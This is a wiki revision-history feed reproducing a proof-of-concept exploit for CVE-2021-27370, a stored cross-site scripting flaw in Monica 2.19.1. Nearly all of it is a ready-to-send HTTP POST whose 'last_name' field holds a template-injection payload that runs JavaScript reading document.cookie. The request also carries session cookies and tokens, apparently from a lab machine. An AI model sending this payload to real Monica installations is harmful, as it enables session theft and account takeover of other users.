https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-27370_Monica_2.19.1_XSS%E6%BC%8F%E6%B4%9E
CVE-2021-27370 Monica 2.19.1 XSS漏洞 - Revision history
2026-04-24T11:35:56Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-27370_Monica_2.19.1_XSS%E6%BC%8F%E6%B4%9E&diff=3627&oldid=prev
Pwnwiki: Created page with "<pre> # Exploit Title: Monica 2.19.1 - 'last_name' Stored XSS # Date: 22-02-2021 # Exploit Author: BouSalman # Vendor Homepage: https://www.monicahq.com/ # Software Link: http..."
2021-05-30T02:48:37Z
<p>Created page with "<pre> # Exploit Title: Monica 2.19.1 - 'last_name' Stored XSS # Date: 22-02-2021 # Exploit Author: BouSalman # Vendor Homepage: https://www.monicahq.com/ # Software Link: http..."</p>
<p><b>New page</b></p><div><pre><br />
# Exploit Title: Monica 2.19.1 - 'last_name' Stored XSS<br />
# Date: 22-02-2021<br />
# Exploit Author: BouSalman<br />
# Vendor Homepage: https://www.monicahq.com/<br />
# Software Link: https://github.com/monicahq/monica/releases<br />
# Version: Monica 2.19.1<br />
# Tested on: Ubuntu 18.04<br />
# CVE : CVE-2021-27370<br />
<br />
POST /people HTTP/1.1<br />
Host: 192.168.99.162<br />
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 199<br />
Origin: http://192.168.99.162<br />
Connection: close<br />
Referer: http://192.168.99.162/people/add<br />
Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IjZBQ21CelczS1ZxS1dmMkNxWFBqN1E9PSIsInZhbHVlIjoiME01aDNSS2FHQ1lZdS9KSVlSL1pKdC9qcHRWRDVveWFvb0ZkUFB4cFlaSDhEclB3SG9UQ3BISzVoWFdYQUYrVkdpUVNkRUNlbUxFOTEyOC9Vb1ZaWFZTblpGOWlRVW9PR0FmSVhyL3JwUmgweU9hODlJWU5vNmQ3aDcrT084MjBoQU5Ednh0TWJ6dmxwS2NadFovMEdveko1V0RvbThXT2Jram1JVW5LcXdqUzl4alVBRDFBYXNjSEt3amRxbVFvQ3pMMGJZU2owWTZzWVp1ZURTNUtoRUlJMnVrV3NiVHRNRTU5YysvLzl2Zz0iLCJtYWMiOiI5MTc2NDAwZTY4NjVmZDg3NjM1YjY3NDRiMzFhMmRiYzIwMjFhODU4YWQyOWUwZmQzOTBlY2Y1ZTI0ODdiNzVkIn0%3D; laravel_token=eyJpdiI6InIwQ2RlQW9FRG5lanlOZmlXWXBRVEE9PSIsInZhbHVlIjoiUHhPNmZneXUydGVCZHlVMEI5cHpiTWI2OE5qajN5UVJXUmJHSFV1VGgya2NEbEJ6T3N0QVhKeUZwU0R4a05HWTgwNTNidTk4aGNXc3UzejY4WDJnaUJ0VUp1ekQ5cjVDc0hLSWpGTzc1ZWRRQ05Yem0vK3RZdEpOVHNQeE4rQ1orbXNJTXhWczJnMENYeGp6Q3NnOGU5TXhpZDd1bS9wRlBZS0xsYmpLSXJiMHhSVmU2NnBUMjdYS1RTQmJrNkU4cWNtZGJVdjFpaXp5a2YzdVZsWWxQMjBicDQxUGFjZlhGbmhCOHl2MkVXdzRoalNtbE9xL010clpZMGJNVmVQNWUzQlpsRFVKamlWQ2Jydk9sZWg3cHNKWVIvRW92alp0YURJcllXa08rTjA4Y2lvVzNHTXBrem11Q21xaW92cEwiLCJtYWMiOiI1YjM5NzViODhjNTk5MWUzNWFjZDg0ZWZmNjk1NjE3MzhhN2M0NGFjNWE3MzMyMGFhNTI2ZjgxMjE4OTRjZDg4In0%3D; XSRF-TOKEN=eyJpdiI6IkZFY1FLVEJFRXJMOWh6Vll1SW51akE9PSIsInZhbHVlIjoiRTVLRFZnOEovNk9XeFB2bXFQZnFlM0FxRU9QMVRxaHRhS3RzOHNpWm45K0xXV1FsbWhzV0RxUWd6bStxVXFBTHF1WlkrSklnSXoxbkFXK1JNcURhUHp6eTFOUHdLclFkTTEvUFhtTDgzVHA2RElFNnVuOWVyRGxCSGJmdzhJOXciLCJtYWMiOiIxOWNlMjkxMjM5ZTlmMDFiZjhiM2VlZjZjZmNmMmFmZDA4MzcyZjc3Yzg2MmQ2MWIwNTY2OTZlNjQyZDkzMjA0In0%3D; laravel_session=eyJpdiI6InBtUThtUFE1RzdvbW40ay8wdWJraXc9PSIsInZhbHVlIjoiS1hoVlJoNzFrYlpBUGRTL2V0YzVDRlR6dHl6NE12NjFxVTEvbXQwYTJnRUwyY3VQc2hOeWlkbUdyeEx5aDBnYlJER1BnbW52RXR0QWs1ZG00eWg0U2JNb3dIRTQ0aU9HK0JnTzE5eXQwUGlzbDNsbVFVa3RabWVQVzF4OXJsUTMiLCJtYWMiOiI3YmQwZDFkYjAwMzdlZTllODAzYjZmNzQ2YWI5NTMzMDY0ZWIzMWIyOWI4MjM4ODMzMDdhNjc2YTE4ZDViZDg0In0%3D<br />
Upgrade-Insecure-Requests: 1<br />
<br />
_token=afJRD6VqgCxIze3tGcCqzyeb3YaFka3fvjqV9YOx&first_name=XSS+POC&middle_name=&last_name=%7B%7B+constructor.constructor%28%22alert%28document.cookie%29%22%29%28%29+%7D%7D&nickname=&gender=&save=true<br />
</pre></div>
Pwnwiki